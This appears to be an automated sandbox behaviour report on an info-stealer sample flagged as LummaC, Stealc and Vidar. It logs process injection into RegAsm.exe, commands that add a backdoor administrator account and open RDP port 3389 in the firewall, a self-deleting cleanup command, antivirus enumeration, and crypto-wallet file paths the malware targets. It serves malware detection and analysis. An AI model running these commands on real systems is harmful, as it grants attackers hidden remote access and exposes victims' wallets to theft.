Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F66008	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C1B008	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userGCAEHDBAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userGCAEHDBAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000
Source: C:\Users\userGCAEHDBAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\userGCAEHDBAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000
Source: C:\Users\userGCAEHDBAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E97008
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1092008
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DF7008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAFHDHCAAKE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGCAEHDBAAE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBGIJEGCGDG.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userAFHDHCAAKE.exe "C:\Users\userAFHDHCAAKE.exe"	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKFHCGIDBA.exe "C:\ProgramData\BKFHCGIDBA.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKJJEBKKEH.exe "C:\ProgramData\BKJJEBKKEH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIEBGIIJDG.exe "C:\ProgramData\GIEBGIIJDG.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AEBAFBGIDHCB" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGCAEHDBAAE.exe "C:\Users\userGCAEHDBAAE.exe"
Source: C:\Users\userGCAEHDBAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userBGIJEGCGDG.exe "C:\Users\userBGIJEGCGDG.exe"
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_615fbfde V24hFLzx4jqu /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_615fbfde V24hFLzx4jqu /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Source: C:\ProgramData\BKFHCGIDBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\BKJJEBKKEH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GIEBGIIJDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_6C2DB341 cpuid

4_2_6C2DB341

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	4_2_00417B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	10_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	10_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	10_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	10_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	10_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	10_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	10_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	10_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	10_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	10_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	10_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	10_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	10_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	10_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	10_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	10_2_0042E6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	10_2_1FFD298C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	10_2_201AFF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	10_2_1FFD2112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	10_2_1FFD2112

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Queries volume information: C:\Users\userAFHDHCAAKE.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Queries volume information: C:\Users\userGCAEHDBAAE.exe VolumeInformation
Source: C:\Users\userBGIJEGCGDG.exe	Queries volume information: C:\Users\userBGIJEGCGDG.exe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\BKFHCGIDBA.exe	Queries volume information: C:\ProgramData\BKFHCGIDBA.exe VolumeInformation
Source: C:\ProgramData\BKJJEBKKEH.exe	Queries volume information: C:\ProgramData\BKJJEBKKEH.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\GIEBGIIJDG.exe	Queries volume information: C:\ProgramData\GIEBGIIJDG.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

4_2_00416920

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,

4_2_00417850

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

4_2_00417A30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001285000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000110A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a65570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a65570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2070552431.0000000003A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2536324223.000000000132A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5280, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 7.2.userAFHDHCAAKE.exe.3945570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.userAFHDHCAAKE.exe.3945570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2971689518.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userAFHDHCAAKE.exe PID: 7136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8188, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: passphrase.json
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
